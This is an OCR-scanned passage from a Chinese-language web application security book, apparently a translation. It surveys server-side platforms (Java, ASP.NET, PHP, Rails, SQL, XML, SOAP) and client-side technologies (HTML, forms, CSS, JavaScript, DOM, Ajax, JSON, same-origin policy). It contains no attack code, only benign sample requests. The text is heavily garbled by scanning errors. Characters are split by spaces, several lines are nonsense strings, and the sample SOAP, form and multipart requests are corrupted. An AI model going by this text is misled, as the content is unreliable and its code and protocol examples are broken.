问 该 资源 的 副本 。 通 第 ， 它 还 会 随 请 求 提交 各 种 参数 。 正 是 这 些 参数 保 
证 了 服务 器 端 应 用 程序 能 够 生成 适合 各 种 用 户 需 求 的 内 容 。HTTP 请 求 
使 用 3 种 主要 方式 向 应 用 程序 传送 参数 : 























口 通 过 URL 查 询 字 符 串 ; 
口 通过 REST 风 格 的 URE 的 文件 路 径 ; 
口 通 过 HTTP cookie; 





口 通 过 在 请 求 主 体 中 使 用 POST 方法 。 

除了 这 些 主要 的 输入 源 以 外 ， 理 论 上 ， 服 务 器 端 应 用 程序 还 可 以 使 
用 HTTP 请 求 的 任何 一 个 部 分 作为 输入 。 例 如 ， 应 用 程序 可 能 通过 User- 
Agent 消 妃 头 生成 根据 所 使 用 的 浏览 器 类 型 而 优化 的 内 容 。 

像 音 见 的 计算 机 软件 一 样 ，Web 应 用 程序 也 在 服务 器 端 使 用 大 量 技 
术 实 现 其 功能 。 这 些 技术 包括 : 

口 脚本 语言 ， 如 PHP、VBScript 和 Perl; 


口 Web 应 用 程序 平台 ， 如 ASP.NET 和 Java; 
口 Web 服 务 器 ， 如 Apache、IIS 和 Netscape Enterprise 
口 数 据 库 ， 如 MS-SQL、Oracle 和 MySQL; 
% 口 其 他 后 端 组 件 ， 如 文件 系统 、 基 于 SOAP 的 Web 服 务 和 目录 服 
本 书 将 详细 介绍 这 些 技术 及 其 相关 漏洞 。 下 面 将 介绍 一 些 可 能 遇 到 
的 最 常见 的 Web 应 用 程序 平台 和 语言 。 





a 
因为 它们 采用 了 非常 实用 的 框架 。” 

在 开发 Web 应 用 程序 时 ， 使 用 实用 框架 往往 是 人 们 放松 警惕 的 
主要 原因 ， 因 为 人 们 认为 这 样 做 就 可 以 自动 避免 SQL 注入 等 常见 的 
漏洞 。 但 由 于 以 下 两 方面 的 原因 ， 这 种 看 法 并 不 正确 。 

首先 ， 大 量 Web 应 用 程序 漏洞 在 应 用 程序 的 设计 ， 而 不 是 实施 
阶段 发 生 ， 和 而 且 ， 这 些 漏洞 与 所 采用 的 开发 框架 或 语言 无 关 。 

其 次 ， 上 述 实用 框架 通常 采用 最 新 的 插件 或 程序 包 ， 而 这 些 程 
序 包 很 可 能 并 未 经 过 安全 检查 。 有 趣 的 是 ， 如 果 之 后 在 应 用 程序 中 
发 现 漏洞 ， 支 持 使 用 框架 的 开发 者 马上 会 改变 立场 ， 转 而 批评 他 们 
使 用 的 框架 或 第 三 方程 序 包 。 


1. Java 平 台 

近 几 年 来 ，Java 平 台 企 业 版 〈 原 J2EE) 事实 上 已 经 成 为 大 型 企业 所 
使 用 的 标准 应 用 程序 。 该 平台 由 Sun 公 司 开 发 〈 现 在 则 属于 Oracle 公 
司 ) 。 它 应 用 多 层 与 负载 平衡 架构 ， 非 常 适 于 模块 化 开发 与 代码 重 复 利 
用 。 由 于 其 历史 悠久 、 应 用 广泛 ， 因 此 ， 开 发 者 在 开发 过 程 中 可 以 利用 
许多 高 质量 的 开发 工具 、 应 用 程序 服务 器 与 框架 。Java 平 台 可 在 几 种 基 
础 型 操作 系统 上 运行 ,包括 Windows、 Linux 与 Solaris。 

描述 基于 Java 的 Web 应 用 程序 时 ， 往 往 会 使 用 许多 易于 混淆 的 术 
语 ， 读 者 应 该 对 它们 有 所 警觉 。 

O Enterprise Java Bean (EJB) 是 一 个 相对 重量 级 的 软件 组 件 ， 它 
将 一 个 特殊 业务 功能 的 逻辑 组 合 到 应 用 程序 中 。EJB 旨 在 处 理应 用 程序 
开发 者 必须 解决 的 各 种 技术 挑战 ， 如 交易 完整 性 。 

口 简 单传 统 Java 对 象 (Plain Old Java Object, POJO) 是 一 个 普通 的 
Java 对 象 ， 以 区 别 如 EJB 之 类 的 特殊 对 象 。POJO 常 用 于 表示 那些 用 户 定 
义 的 、 比 EJB 更 加 简单 且 更 加 轻 量 级 的 对 象 以 及 用 在 其 他 框架 中 的 对 
































象 。 
口 Java Servle 提 应 用 程序 服务 器 中 的 一 个 对 象 ， 它 接收 客户 端的 
orn 回 HTTP 啊 应 。Servlet 可 使 用 大 量 接口 来 促进 应 用 程序 开 


DJava Web 容 器 是 一 个 为 基于 Java 的 Web 应 用 程序 提供 运行 时 环境 
的 平台 或 引擎 。Apache Tomcat、BEA WebLogic 和 JBoss 都 属于 Java Web 
容器 。 

许多 Java Web 应 用 程序 在 定制 代码 中 使 用 第 三 方 与 开源 组 件 。 这 种 
做 法 非常 具有 吸引 力 ， 因 为 它 能 够 减轻 开发 工作 ， 而 且 Java 非 常 适 于 使 
用 这 种 模块 式 的 方法 。 关 键 应 用 程序 功能 常用 的 组 件 包括 








口号 份 验证 JAAS、ACEGI; 
口 表示 层 SiteMesh、Tapestry; 


口 数 据 库 对 象 关系 映射 

OAS Log4J. 

如 果 能 够 确定 受 攻击 的 应 用 程序 所 使 用 的 开源 软件 包 ， 渗 透 测 试 员 
就 可 以 下 载 这 些 软 件 包 进 行 代码 审查 ， 或 者 安装 它们 开始 攻击 实验 。 这 
些 组 件 中 的 任何 一 个 漏洞 都 可 能 被 攻击 者 利用 。 

2. ASP.NET 

ASP.NET 是 Microsoft 开 发 的 一 种 Web 应 用 程序 框架 ， 也 是 Java 平 台 
的 主要 竞争 对 手 。ASP.NET 比 Java 平 台 晚 几 年 推出 ， 但 它 已 经 占领 了 
Java 平 台 的 部 分 市 场 。 

ASP.NET 使 用 Microsoft 的 .NET Framework， 提 供 一 个 虚拟 机 
[CLR (Common Language Runtime， 通 用 语言 运行 时 ) ] 与 一 组 强大 
的 API。 因 此 ，ASP.NET 应 用 程序 可 使 用 任何 .NET 语 言 〈 如 C# 或 
VB.NET) 来 编写 。 

ASP.NET 采 用 传统 桌面 软件 常用 的 事件 驱动 编程 范 型 ， 而 非 许多 早 
期 Web 应 用 程序 框架 所 使 用 的 基于 脚本 的 方法 。 基 于 这 种 特点 ， 再 结合 
Visual Studio 提 供 的 强大 开发 工具 ， 任 何人 即使 并 不 具备 熟练 的 编程 技 
能 ， 也 能 迅速 开发 出 功能 强大 的 Web 应 用 程序 。 

不 需要 开发 者 做 任何 工作 ，ASP.NET 框 架 就 能 防御 一 些 常见 的 web 
应 用 程序 漏洞 ， 如 路 站 点 脚本 。 但 这 种 明显 简化 的 特点 也 造成 一 个 现实 
问题 ， 即 许多 小 型 的 ASP.NET 应 用 程序 实际 上 由 初学 者 开发 ， 他 们 对 于 
Web 应 用 程序 面临 的 核心 安全 问题 缺乏 了 解 。 

3. PHP 

PHP 语 言 源 于 一 个 业余 项 目 [ 最 初 该 缩写 词 代 表 个 人 主页 
(Personal Home Page) | 。 之 后 ， 访 项 目 迅速 发 展 成 为 一 个 功能 强 
大 、 应 用 丰富 的 Web 应 用 程序 开发 框架 。PHP 常 常 与 其 他 免费 技术 整 


Hibernate; 














合 ， 如 所 谓 的 LAMP 组 合 〈 包 括 操作 系统 Linux、Web 服 务 器 Apache、 数 
据 库 服务 器 MySQL 和 Web 应 用 程序 编程 语言 PHP) 。 

人 们 使 用 PHP 开 发 出 大 量 的 开源 应 用 程序 与 组 件 ， 它 们 为 常用 的 应 
用 程序 功能 提供 了 现成 的 解决 方案 ， 并 将 其 整合 到 应 用 更 加 广泛 的 定制 
应 用 程序 中 ， 例 如 : 




















a 公告 牌 一 一 PHPBB、PHP-Nuke:; 

口 管 理 前 端 一 一 PHPMyAdmin; 

口 Web 邮 件 SquirrelMail, IlohaMail; 
口 相 册 Gallery; 

口 购物 车 osCommerce. ECW-Shop; 
口 维 客 一 - MediaWiki、WakkaWikki。 








由 于 PHP 完 全 免费 ， 简 单 易 用 ， 因 此 许多 编写 web 应 用 程序 的 初学 
者 往往 使 用 它 作为 首选 语言 。 但 是 ， 由 于 历史 原因 ，PHP 框 架 的 设计 方 
法 与 默认 配置 导致 程序 员 很 容易 不 经 意 间 在 代码 中 引入 安全 漏洞 ， 因 此 
使 用 PHP 编 写 的 应 用 程序 中 可 能 包含 大 量 安全 漏洞 。 除 此 之 外 ，PHP 平 
台 本 刁 也 存在 若干 缺陷 ， 在 平台 上 运行 应 用 程序 就 可 对 其 加 以 利用 。 请 
参阅 第 19 章 了 解 有 关 PHP 应 用 程序 常见 漏洞 的 详情 。 

4. Ruby On Rails 

Rails 1.0 于 2005 年 发 布 ， 主 要 侧重 于 模型 -视图 -控制 器 体系 架构 。 
Rails 的 主要 优势 在 于 ， 使 用 它 能 够 以 极 快 的 速度 创建 成 熟 的 数据 驱动 应 
用 程序 。 如 果 开 发 者 遵循 Rails 编 码 风 格 和 命名 约定 ， 则 可 以 使 用 Rails 自 
动 生成 数据 库 内 容 的 模型 、 修 改 该 模型 的 控制 右 操 作 以 及 供应 用 程序 用 
户 使 用 的 默认 视图 。 与 其 他 功能 强大 的 新 拉 术 一 样 ， 人 们 已 在 Ruby On 
Rails 中 及 现 了 一 些 漏洞 ， 包 括 能 够 避 开 “安全 模式 ”， 这 与 在 PHP 中 发 现 
的 漏洞 类 似 。 

有 关 最 近 发 现 的 漏洞 的 详细 信息 ， 请 参阅 www.ruby- 
lang.org/en/security/。 

5. SQL 

结构 化 查询 语言 (SQL) 用 于 访问 Oracle、MS-SQL 服 务 器 和 
MySQL 等 天 系数 据 库 中 的 数据 。 目 前 ， 绝 大 多 数 的 Web 应 用 程序 都 将 基 
于 SQL 的 数据 库 作 为 它们 的 后 端 数据 仓库 ， 而 且 ， 几 乎 所 有 应 用 程序 的 
功能 都 需要 以 东 种 方式 与 这 些 数据 仓库 进行 交互 。 

关系 数据库 将 数据 存储 在 表 中 ， 每 个 表 义 由 许多 行 和 列 构成 。 每 一 
列 代表 一 个 数据 字段 ， 如 “名 称 ? 或 “电子 邮件 地 址 ”， 每 一 行 则 代表 为 这 
些 字段 中 的 一 些 或 全 部 字段 分 配 值 的 项 。 

SQL 使 用 查询 来 执行 第 用 的 任务 ， 如 读 取 、 添 加 、 更 新 和 删除 数 
据 。 例 如 ， 要 检索 用 户 的 具有 指定 名 称 的 电子 邮件 地 址 ， 应 用 程序 可 以 



































TT LAR ei: 

要 实现 它们 所 需 的 功能 ，Web 应 用 程序 可 能 会 将 用 户 提 交 的 输入 组 
合 到 由 后 端 数据 库 执行 的 SQL 碍 询 中 。 如 果 以 危险 的 方式 进行 组 合 ， 攻 
击 者 就 可 以 提交 恶意 输入 来 干扰 数据 库 的 行为 ， 从 而 读 取 和 写 入 敏感 数 
据 。 我 们 将 在 第 9 章 中 介绍 这 些 攻 击 ， 并 详细 说 明 SQL 语 言及 其 用 法 。 

6. XML 

可 扩展 标记 语言 (XML) 是 一 种 机 器 可 读 格 式 的 数据 编码 规范 。 
与 其 他 标记 语言 一 样 ，XML 格 式 将 文档 划分 为 内 容 ( 数 据 〉 和 标记 
(给 数据 作 注解 〉。 

标记 主要 用 标签 表示 ， 它 们 包括 起 始 标 签 、 结 束 标签 和 空 元 系 标 


YY o 





acname> 


gname / 


ORR ZH Rs Se OT HL, SEA AY DS CRS A BCR 
<pet>ginger</pet> 
<pets><dog>spot</dog><cat>paws</cat></pets> 

标签 可 以 包含 以 名 / 值 对 出 现 的 属性 : 


‘data version="2.1"><pets>...</pets></data> 





XML 之 所 以 可 扩展 ， 是 因为 它 可 以 使 用 任意 数量 的 标签 和 属性 
名 。XML 文 档 通 党 包含 文档 类 型 定义 (DTD) ，DTD 和 定义 文档 中 使 用 
的 标签 、 属 性 及 其 组 合 方式 。 

服务 器 端 和 客户 端 Web 应 用 程序 广泛 采用 XML 及 由 XML 浅 生 的 技 
术 ， 我 们 将 在 本 章 后 面部 分 介绍 这 些 内 容 。 

7. Web 服 务 

虽然 本 书 主 要 介绍 Web 应 用 程序 攻击 ， 但 本 书 介 绍 的 许多 漏洞 同样 
e a 
JGUIAI Ù o 

Web 服 务 使 用 简单 对 象 访问 协议 SOAP) 来 交换 数据 。 通 常 ， 
SOAP 使 用 HTTP 协 议 来 传送 消息 ， 并 使 用 XML 格式 表示 数据 。 

典型 的 SOAP 请 求 如 下 所 示 : 








Eost: mdsec-mer.int.mdsec.net 





Content-Type: application/soaptxml; charset=utf-8 
Content-Length: 891 
<?xml version="1.0"?> 
soap: En min ay http://w 3 { 2 ay log > 
soap : BOGY 
<pre:Ada xmins:pre=http tare soap: encodingStyle 


<FromAccount>18281008</FromAccount> 
Amour 430</Amount> 
ClearecFunds>Fal Clea Funa 
ToAcc n 8447E ToAc 
coun 
pr Acc> 
soap : Body> 


bp: Snvelope> 


在 使 用 浏览 器 访问 Web 应 用 程序 时 很 可 能 会 遇 到 SOAP， 服 务 器 端 
应 用 程序 使 用 它 与 各 种 后 端 系 统 进行 通信 。 如 果 将 用 户 提交 的 数据 直接 
组 合 到 后 端 SOAP 消 息 中 ， 就 可 能 产生 与 SQL 注入 类 似 的 漏洞 。 我 们 将 
在 第 10 章 详细 介绍 这 些 问 题 。 
如 果 Web 应 用 程序 还 直接 公开 Web 服 务 ， 那 么 ， 我 们 还 需要 检查 这 
些 Web 服 务 。 即 使 前 端 应 用 程序 是 基于 Web 服 务 编写 的 ， 但 它们 在 输入 
处 理 以 及 服务 本 身 所 披露 的 功能 方面 仍 存在 区 别 。 正 常情 况 下 ， 服 务 器 
会 以 Web 服 务 描述 语言 CWSDL) 格式 公布 可 用 的 服务 和 参数 。 攻 击 者 
可 以 使 用 soapUI 之 类 的 工具 、 基 于 已 公布 的 WSDEL 文 件 创建 示例 请 求 ， 
NI ai eaten eile tate 
Tak. 
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AART, AEREA RESNA O. A EA 
的 方法 各 不 相同 。 而 且 ， 近 些 年 来 ， 应 用 程序 利用 客户 端 技术 的 方式 也 
直 在 发 生 急 剧变 化 。 
1. HTML 


HTML 是 建立 Web 界 面 所 需 的 核心 技术 。 这 是 一 种 用 于 描述 浏览 器 
所 显示 的 文档 结构 的 基于 标签 的 语言 。 最 初 ，HIML 只 能 对 文本 文档 进 
行 简单 的 格式 化 处 理 。 如 今 ， 它 已 经 发 展 成 为 一 种 应 用 丰富 、 功 能 强大 


的 语言 ， 可 用 于 创建 非常 复杂 、 功 能 强大 的 用 户 界 面 。 

XHTML 是 HTML 的 进化 版 本 ， 它 基于 XML， 并 采用 比 旧 版 HTML 
更 严格 的 规范 。 之 所 以 推出 XHTML， 部 分 是 因为 需要 转 而 采用 一 种 更 
加 严格 的 HTML 标 记 标 准 ， 以 避免 由 于 浏览 器 必须 接受 不 太 严 格 的 
HTML 格 式 而 导致 的 各 种 攻击 和 安全 问题 。 

有 关 HTML 及 相关 技术 的 详情 ， 请 参阅 下 面 的 几 节 。 

2. 超 链 接 

客户 端 与 服务 器 之 间 的 大 量 通 信和 都 由 用 户 单 击 超 链接 驱动 。Web 应 
用 程序 中 的 超 链接 通常 包含 预先 设 定 的 请 求 参 数 ， 这 些 数 据 项 不 需 由 用 
户 输 入 ， 而 是 由 服务 器 将 其 插入 用 户 单 击 的 超 链接 的 目标 URL 中 ， 以 这 
Os 
FN ZI H : 


<a hret="?redir=/updates/update29.html">What's happening?</a> 
当 用 户 单 击 这 个 链接 时 ， 浏 览 器 会 提出 以 下 请 求 : 

GET /news/8/?redir=/updates/update29.html HTTP/1.1 

Host: mdsec.net 








服务 器 收 到 查询 字符 串 中 的 参数 (newsid) ， 并 使 用 它 的 值 决定 向 用 户 
返回 什么 内 容 。 

3. 表单 
虽然 基于 超 链 接 的 导航 方法 负 贡 客户 端 与 服务 器 之 间 的 绝 大 多 数 通 
信 ， 但 许多 Web 应 用 程序 还 是 需要 采用 更 灵活 的 形式 收集 输入 ， 并 接收 
用 户 输入 。HITML 表 单 是 一 种 常见 的 机 制 ， 多 许 用 户 通 过 浏览 器 提 区 任 
意 输 入 。 以 下 是 一 个 典型 的 HTTP 表单 : 


<form action="/secure/login.php?app=quotations” method="post"> 











username: <input type="text" name="username"><br> 


password: <input type="password" name="password"> 


<input type="hidden" name="redir" value="/secure/home.php"> 
<input type="submit" name="submit" values"log in"> 
</form> 


FAP FERS HAEA pe CP FEI, A aa eH DP ok: 


POST /secure/login.php?app=quotations HTTP/1.1 
Host: wahh-app.com 

Content-Type: application/x-www- form-urlencoded 
Content-Length: 39 


Cookie: SESS=GTnrpx2ss2ctSvSnhxXJGyGOLJ47MXRsjcFM53a 


sername=caf&password=foo&éredir=/s ure/home.php&submit=log+in 


ae 求 中 ， 有 有 几 个 要 paren 了 请 求 如 何 使 用 rt 
bE. 

口 内 为 HTML 表 单 标签 中 包含 一 个 指定 POST 方 法 的 属性 ， 浏 览 器 就 
使 用 这 个 方法 提交 表单 ， 并 将 表单 中 的 数据 存 入 请 求 消息 主体 中 。 

口 除 用 户 输 入 的 两 个 数据 外 ， 表 单 中 还 包含 一 个 隐藏 参数 Credir) 
与 一 个 提交 参数 (submit) 。 这 两 个 参数 都 在 请 求 中 提交 ， 服 务 右 端 应 
用 程序 可 使 用 它们 控制 其 逻辑 。 

口 与 前 面 显 示 的 超 链接 示例 一 样 ， 负 责 表单 提交 的 目标 URL 也 包含 
yee Capp) 。 该 参数 可 用 于 控制 服务 器 端的 处 理 过 
Eo 

口 请 求 中 包含 一 个 cookie 参 数 (SESS) ， 服 务 器 在 早先 的 响应 中 将 
其 发 布 给 浏览 器 。 访 参数 可 用 于 控制 服务 器 端 处 理 过 程 。 

前 面 的 请 求 中 包 售 一 个 消息 头 ， 它 规定 消息 主体 中 的 内 容 类 型 为 x- 
www-form-urlencoded。 这 表示 和 URL 查 询 字 符 串 中 的 一 样 ， 消 思 主 体 
中 的 参数 也 以 名 / 值 对 表示 。multipart/form-data 是 提交 表单 数据 时 可 能 过 
到 的 男 一 种 类 型 的 内 容 。 应 用 程序 可 在 表单 标签 的 enctype 属 性 中 要 求 浏 
览 器 使 用 多 部 分 编码 。 使 用 这 种 编码 形式 ， 请 求 中 的 Content-Type 消 明 
头 还 会 指定 一 个 随机 字符 串 ， 用 它 来 分 隔 请 求 主 体 中 的 参数 。 例 如 ， 如 
果 表 单 指 定 多 部 分 编码 ， 其 生成 的 请 求 如 下 所 示 : 




















POST /secure/login.ohp?app-quotations HTTP/1.1 

Host: wahh-app.com 

Content-Type: multipart/form-data; boundary=------------7d71385a0ala 
Content-Length: 169 


Cookie: SESS=GTnrpx2ss2tSwSnhxJGyG0lal4 IMXRs jcPM63d 


------7d71385da0ala 


Content-Disposition: form-data; name="username" 


daf 
7a71385dad0ala 
Content-Disposition: form-data; name="password" 


Content-Disposition: form-data; name="redir*® 


7d71385d0al 
Content-Dispositicon: form ta; name="submi 
og in 
~ 一 一 一 一 ~ 一 一 一 一 一- 7d71285a0ala-- 


4. CSS 

BBR (CSS) 是 一 种 描述 以 标记 语言 编写 的 文档 的 表示 形式 
的 语言 。 在 Web 应 用 程序 中 ，CSS 用 于 指定 HTML 内 容 在 屏幕 上 《〈 以 及 
打印 页 面 等 其 他 媒介 中 ) 的 呈现 方式 。 

现代 的 Web 标 准 力 求 将 文档 的 内 容 与 其 表示 形式 尽 可 能 地 区 分 开 
来 。 这 种 区 分 具有 许多 好 处 ， 包 括 简化 和 缩小 HIML 页 面 ， 更 易于 更 新 
网 页 的 格式 以 及 提高 可 访问 性 等 。 

CSS 以 各 种 格式 化 规则 为 基础 ， 这 些 规则 可 以 通过 不 同 的 详细 程度 
进行 定义 。 如 果 多 个 规则 与 一 个 文档 元 素 相 匹配 ， 在 这 些 规则 中 定义 的 
不 同属 性 将 进行 “ 层 登 ?>， 从 而 将 适当 的 样式 属性 组 合 应 用 于 该 元 素 。 

CSS 语 法 使 用 选择 器 来 定义 一 类 标记 元 素 〈 应 将 一 组 指定 的 属性 应 
用 于 这 些 元 素 ) 。 例 如 ， 下 面 的 CSS 规 则 定义 使 用 <h2> 标 签 标 记 的 标题 
的 前 景 颜色 : 

h2 { color: red; } 

在 Web 应 用 程序 安全 的 早期 阶段 ，CSS 在 很 大 程度 上 被 人 们 所 名 
略 ， 人 们 认为 它们 不 可 能 造成 安全 威胁 。 今 天 ，CSS 本 和 喘 正 不 断 成 为 安 
全 漏洞 的 来 源 ， 并 且 被 攻击 者 作为 传送 针对 其 他 类 型 的 漏洞 的 入 侵 程 序 
的 有 效 手段 (有关 详 细 人 信息， 请 参阅 第 12 间 和 第 13 半 ) 。 

5. JavaScript 




















超 链接 与 表单 可 用 于 建立 能 够 轻易 接收 大 多 数 wWeb 应 用 程序 所 需 输 
入 的 丰富 用 户 界 面 。 然 而 ， 许 多 应 用 程序 使 用 一 种 更 加 分 布 式 的 模型 ， 
不 仅 使 用 客户 端 提 交 用 户 数据 与 操作 ， 还 通过 它 执行 实际 的 数据 处 理 。 
这 样 做 主要 出 于 两 个 原因 。 

口 改 善 应 用 程序 的 性 能 ， 因 为 这 样 可 在 客户 问 组 件 上 彻底 执行 某 些 
任务 ， 不 需要 在 服务 器 间 来 回 发 送 和 接收 请 求 与 啊 应 。 

口 提 高 可 用 性 ， 因 为 这 样 可 根据 用 户 操作 动态 更 新 用 户 界 面 ， 而 不 
需要 加 载 服务 器 传送 的 全 新 HIML 页面。 

JavaScript 是 一 种 相对 简单 但 功能 强大 的 编程 语言 ， 使 用 它 可 方便 地 
以 各 种 仅 使 用 HIML 无 法 实现 的 方式 对 Web 界 面 进行 扩展 。JavaScript 第 
用 于 执行 以 下 任务 。 
口 确 认 用 户 输 入 的 数据 ， 然 后 将 其 提交 给 服务 器 避免 因数 据 包 含 错 
误 而 提交 不 必要 的 请 求 。 
口 根 据 用 户 操作 动态 修改 用 户 界 面 ， 例 如 ， 执 行 下 拉 沫 单 和 其 他 类 
似 于 非 Web 界 面 的 控制 。 
口 查询 并 更 新 浏览 器 内 的 文档 对 象 模型 (Document Object Model, 
DOM) ， 控 制 浏览 器 行为 《 稍 后 就 会 介绍 浏览 器 DOM) 。 

6. VBScript 

VBScript # H F BARR A Internet Explorer 浏 览 器 才 支 持 的 
JavaScript。VBScript 以 Visual Basic 为 基础 ， 并 可 以 与 浏览 器 DOM 进 行 
交互 。 但 通常 而 言 ，VBScript 不 如 JavaScript 强 大 和 成 就 。 

由 于 VBScript 只 能 在 特定 浏览 器 中 使 用 ， 今 天 的 Web 应 用 程序 已 经 
很 少 使 用 VBScript。 从 安全 角度 看 ， 我 们 之 所 以 对 它 感 兴趣 ， 是 因为 在 
使 用 JavaScript 无 法 传送 入 侵 程序 时 ， 攻 击 者 可 以 通过 它 来 传送 针对 跨 站 
点 脚本 之 类 漏洞 的 入 侵 程序 〈 请 参阅 第 12 章 ) 。 

7. 文档 对 象 模型 

文档 对 象 模型 (DOM) 是 可 以 通过 其 API 查 询 和 操纵 的 HIML 文 档 
的 抽象 表示 形式 。 

DOM 人 允许 客户 端 脚 本 按 id 访 问 各 个 HTML 元 素 并 以 编程 方式 访问 这 
些 元 素 的 结构 。DOM 还 可 用 于 读 取 和 更 新 当前 URL 和 cookie 等 数据 。 男 
外 ，DOM 还 包括 一 个 事件 模型 ， 以 便于 代码 钩 住 各 种 事件 ， 如 表单 提 
交 、 通 过 链接 导航 及 键 击 。 

如 下 一 节 所 述 ， 浏 览 器 DOM 操 纵 是 基于 Ajax 的 应 用 程序 采用 的 关 
键 技 术 。 

8. Ajax 

Ajax 是 一 组 编程 技术 ， 用 于 在 客户 端 创建 骨 在 模拟 传统 泉 面 应 用 程 
序 的 流畅 交互 和 动态 行为 的 用 户 界 面 。 
































Ajax 是 “异步 JavaScript 和 XML" 的 缩写 ， 尽 管 今天 的 Web Ajax 请 求 
既 不 需要 是 异步 请 求 ， 也 不 使 用 XML 。 

最 早 的 web 应 用 程序 基于 完整 的 页 面 。 每 个 用 户 操作 ， 如 单 击 链接 
或 提交 表单 ， 都 会 启动 窗口 级 别 的 导航 事件 ， 导 致 服务 器 加 载 新 页 面 。 
这 种 运行 方式 会 导致 不 连续 的 用 户 体验 ， 在 应 用 程序 收 到 来 自 服务 器 的 
庞大 响应 并 重新 显示 整个 页 面 时 ， 会 出 现 长 时 间 的 延迟 。 

使 用 Ajax， 一 些 用 户 操 作 将 由 客户 端 脚 本 代码 进行 处 理 ， 并 且 不 需 
要 重新 加 载 整 个 页 面 。 相 反 ， 肢 本 会 “在 后 台 ” 执 行 请 求 ， 并 且 通 常会 收 
到 较 小 的 啊 应 ， 用 于 动态 更 新 一 部 分 用 户 界 面 。 例 如 ， 在 基于 Ajax 的 购 
物 应 用 程序 中 ， 如 果 用 户 单 击 “ 添 加 到 购物 车 ”按钮 ， 应 用 程序 将 局 动 一 
个 后 台 请 求 ， 在 服务 器 端 更 新 用 户 的 购物 车 记录 ， 随 后 ， 一 个 轻 量 级 啊 
应 会 更 新 用 户 屏 幕 上 显示 的 购物 车 中 商品 的 数量 。 浏 览 器 中 的 整个 页 面 
几乎 保持 不 变 ， 这 样 束 为 用 户 帝 来 更 快速 、 更 满意 的 体验 。 

Ajax 使 用 的 核心 技术 为 XMLHttpRequest。 经 过 一 定 程度 的 标准 整合 
之 后 ， 这 种 技术 现在 已 转化 为 一 个 本 地 JavaScript 对 象 ， 客 户 端 脚本 可 以 
通过 该 对 象 提出 “后 台 ” 请 求 ， 而 无 有 顷 窗 口 级 别 的 导航 事件 。 尽 管 其 名 称 
仅 包含 请 求 ， 但 XMLHttpRequest 人 允许 在 请 求 中 发 送 以 及 在 响应 中 接收 
任意 数量 的 内 容 。 虽 然 许 多 Ajax 应 用 程序 确实 使 用 XML 对 消息 数据 进行 
格式 化 ， 但 越 来 越 多 的 Ajax 倾 同 于 使 用 其 他 表示 方法 来 交换 数据 (下 一 
节 提 供 了 一 个 相关 示例 ) 。 

值得 注意 的 是 ， 虽 然 大 多 数 Ajax 应 用 程序 确实 与 服务 器 进行 异步 通 
信 ， 但 这 并 不 是 必需 的 。 在 某 些 情况 下 ， 如 执行 特殊 操作 时 ， 可 能 需要 
阻止 用 户 与 应 用 程序 进行 交互 。 这 时 ， 由 于 不 需要 重新 加 载 整个 页 面 ， 
Ajax 将 提供 更 加 无 颖 的 体验 。 

以 前 ， 使 用 Ajax 已 在 Web 应 用 程序 中 引入 了 一 些 新 的 漏洞 。 从 更 广 
义 的 角度 看 ， 使 用 Ajax 会 在 服务 器 端 和 客户 端 引 入 更 多 潜在 的 攻击 目 
标 ， 因 而 增加 了 典型 应 用 程序 的 受 攻 击 面 。 在 设计 针对 其 他 漏洞 的 更 加 
高 效 的 入 侵 程 序 时 ， 攻 击 者 也 可 以 利用 Ajax 技术 。 有 关 详 细 信 息 ， 请 参 
阅 第 12 章 和 第 13 章 。 

9. JSON 

JavaScript 对 象 表示 法 (ISON) 是 一 种 可 用 于 对 任意 数据 进行 序列 
化 的 简单 数据 交换 格式 。JSON 可 直接 由 JavaScript 解 释 器 处 理 。Ajax 应 
用 程序 经 常 使 用 JSON， 以 蔡 换 最 初 用 于 数据 传输 的 XML 格式 。 通 第 ， 
如 果 用 户 执行 某 个 操作 ， 客 户 端 JavaScript 将 使 用 XMLHttpRequest 将 该 
操作 传送 到 服务 器 。 服 务 器 则 返回 一 个 包含 JSON 格 式 的 数据 的 轻 量 级 
人 
































例如 ， 基于 Ajax 的 Web 邮 件 应 用 程序 可 可 能 提供 显示 所 选 联系 人 的 详 
细 资 料 的 功能 。 如 果 用 户 单 击 某 位 联系 人 ， 浏 览 器 将 使 用 
XML HupRequest HIE ATED 并 使 用 JSON 返 回 这 些 资 


name “Mike Kemp 
id 804114867 
"email": “fkwitt@layerone.com" 


Z ving HA ASS (5 FA JavaScript lie PE As OK Ah FE ISONMa] by FEE EL N AE SE 
用 户 界面 的 相关 部 分 。 

此 外 ， 当 前 的 应 用 程序 还 将 JSON 用 于 封装 传统 上 位 于 请 求 参数 中 
的 数据 。 例 如 ， 如 果 用 户 更 新 联系 人 的 详细 资料 ， 则 可 以 使 用 以 下 请 求 
将 新 信息 1 


Content-Type: application/x-www-form-urlencoded 


Content-Length: 89 


Contact={"name":"Mike Kemp", *id"*:"8041148671", "email": "pikey@ 
clappymonkey.com”} 


&submit=updat 


10. 同 源 策略 

同 源 策 略 是 浏览 器 实施 的 一 种 关键 机 制 ， 主 要 用 于 防止 不 同 来 源 的 
内 容 相 互 干扰 。 基 本 上 ， 从 一 个 网 站 收 到 的 内 容 可 以 读 取 并 修改 从 该 站 
点 收 到 的 其 他 内 容 ， 但 不 得 访问 从 其 他 站 点 收 到 的 内 容 。 

如 果 不 使 用 同 源 策略 ， 那 么 ， 当 不 知情 的 用 户 浏览 到 某 个 恶意 网 站 
时 ， 在 该 网 站 上 运行 的 脚本 代码 将 能 够 访问 这 名 用 户 同时 访问 的 任何 其 
他 网 站 的 数据 和 功能 。 这 样 ， 该 恶意 站 点 就 可 以 从 用 户 的 网 上 银行 进行 
转账 、 阅 读 用 户 的 web 邮件， 或 在 用 户 网 上 购物 时 拦截 他 的 信用 卡 信 
息 。 为 此 ， 浏 览 器 实施 限制 ， 只 人 允许 相同 来 源 的 内 容 进行 交互 。 

实际 上 ， 将 这 一 概念 应 用 于 各 种 Web 功 人 上 和 技术 会 导致 各 种 复杂 情 
况 和 风险 。 关 于 同 源 策略 ， 需 要 了 解 的 一 些 主 要 特点 如 下 。 

T a 但 该 页 面 本 身 无 法 处 理 上 述 请 求 返 

口 位 于 一 个 域 中 的 页 面 可 以 加 载 来 自 其 他 域 的 脚本 并 在 自己 的 域 中 

执行 这 个 脚本 。 这 是 因为 脚本 被 假定 为 包含 代码 ， 而 非 数 据 ， 因 此 跨 域 

















访问 并 不 会 泄露 任何 敏感 信息 。 

口 位 于 一 个 域 中 的 页 面 无 法 读 取 或 修改 属于 另 一 个 域 的 cookie 或 其 
他 DOM 数 据 。 

这 些 特点 可 能 导致 各 种 跨 域 攻击 ， 如 诱 使 用 户 执 行 操作 和 捕获 数 
据 。 此 外 ， 由 于 浏览 器 扩展 技术 以 各 种 方式 实施 同 源 限 制 ， 这 一 问题 变 
